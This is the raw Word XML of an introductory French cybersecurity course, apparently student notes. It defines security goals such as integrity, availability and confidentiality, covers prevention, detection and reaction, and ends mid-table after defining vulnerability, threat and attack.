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752A7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_lqddwxubq7rr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4B8AC003" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24F509C9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_cu261t2lvgq8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="67851D90" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_2ty19gi5l7gi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="78CC0A54" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_u71lr52ogow5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="46B543BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_50c0yzwnva7p" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="32F449A8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_3lw6yhpdl8yn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>CYBERSÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA7B02" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_d1jqx8tuyhy7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6D0DF8C8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_djy7pv3t0l9o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4C0DF090" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4DD2B155" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="26E9EEBC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="77786880" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="614DFE45" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="08207C01" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6141EB28" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="38E75199" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1D321BEC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2665EF33" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2F962F6D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2FA62F68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="15757536" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="561E5695" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="64EC7448" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5E35EC69" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="55BB5475" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0EA3DDF4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3F869E20" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2A6D0C37" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_qkkdylyb7rc6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">I - Introduction à la sécurité informatique </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A649C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="56728B37" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="03538EF5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les principes de base de la sécu info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379FF58A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les actes malveillants courant des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B933E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L’aspect éthique et juridique de la sécu info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C6F6B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Respect des lois lors de l'utilisation des outils de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB10B2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="35BC58AE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="15A2CC40" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_8jrml6imiwel" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Chapitre 1 - Les principes de base de la sécurité informatique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21828034" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="267D1346" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_om34bgdo06g3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Objectifs de la sécurité informatique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>coeur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275929BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3122D" w14:textId="08AC4364" w:rsidR="00223B72" w:rsidRDefault="00000000" w:rsidP="00A44E23">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">L’intégrité </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: consiste à </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44E23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>protéger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> les données </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44E23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> toute </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44E23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>suppression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44E23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> abusive afin de garantir que les données sont bien celles que l’on croit être. (Chiffrement des données) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD0C02" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC28363" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>La disponibilité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : les contrôles de sécurité, les systèmes info et les logiciels doivent tous fonctionner correctement pour garantir que les services et les systèmes info sont dispo en cas de besoin. (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MàJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et correction des failles de sécurité) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733764EC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F27AA85" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">La confidentialité </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: est basée sur le principe du moindre privilège. Elle consiste à empêcher les accès non autorisés aux données sensibles afin d’éviter qu’elles ne tombent entre les mains des mauvaises personnes. (Chiffrement, authentification, mots de passe) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC582AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77327F22" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>non répudiation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : elle consiste en l’assurance qu’une action sur la donnée réalisée au nom d’un utilisateur (après authentification) ne saurait être répudiée par ce dernier. Garantir qu’une transaction ne peut être niée. (Chiffrements de données, authentification, mots de passe) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67443136" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3E20DA2E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">L’authentification </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: assurer que seules les personnes autorisées aient accès aux ressources </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5EF054" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_86onrcbd635h" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0E368349" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_jgecmotqal83" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 - Les aspects élémentaires de la sécurité informatique </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5746E8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1B4825C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">La prévention </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DCE6B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analyser les risques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B6AD1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Définir une politique de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018DD58E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mettre en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oeuvre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> une solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39466534" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evaluer cette solution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA553B5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mettre à jours la solution et la politique au regard de l’évolution des risques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D892790" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="21BF8CDE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4C8BD40C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>La détection :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> effectuer un inventaire des actifs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52C16E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Des systèmes d’exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D3501C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Antivirus à jours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B51005" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examiner les programmes et services inactif </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E348574" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6FF093B8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>La réaction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : qui peut accéder à quoi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5FFF4A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Niveau d’accès de chaque utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1A70E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rechercher les pics suspects d’activité (suppression de données, connexions illicites, …) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02029098" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_7g6xgsa6mbm6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3771B5CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2057E46C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="66E2CC23" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="25BE50CE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_jp7bcr40uiwe" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Chapitre 2 - Les actes malveillants courant des systèmes informatiques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112EAC81" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469C9725" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_gvs3ga2rwxqx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Les trois notions en sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005F4ED2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="635F82BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62276C32" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Faiblesse au niveau d’un bien</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (au niveau de la conception, de la réalisation, de l’installation, de la configuration ou de l’utilisation du bien). *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E92BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="35FFDE3C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Menace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD7685" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Cause potentielle d’un incident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, qui pourrait entraîner des dommages sur un bien si cette menace se concrétisait. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8942D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4D193D3E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Attaque </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F4485" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Action malveillante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> destinée à porter atteinte à la sécurité d’un bien. Une attaque représente la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>concrétisation d’une menace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et nécessite l’exploitation d’une vulnérabilité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680489B7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="112424CC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Une attaque ne peut donc avoir lieu (et réussir) que si le bien est affecté par une vulnérabilité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A46E7E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>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23B72" w14:paraId="302D941A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4CCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="692F9D14" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Ainsi, tout le travail des experts sécurité consiste à s’assurer que le S.I ne possède aucune vulnérabilité. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62AA0924" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
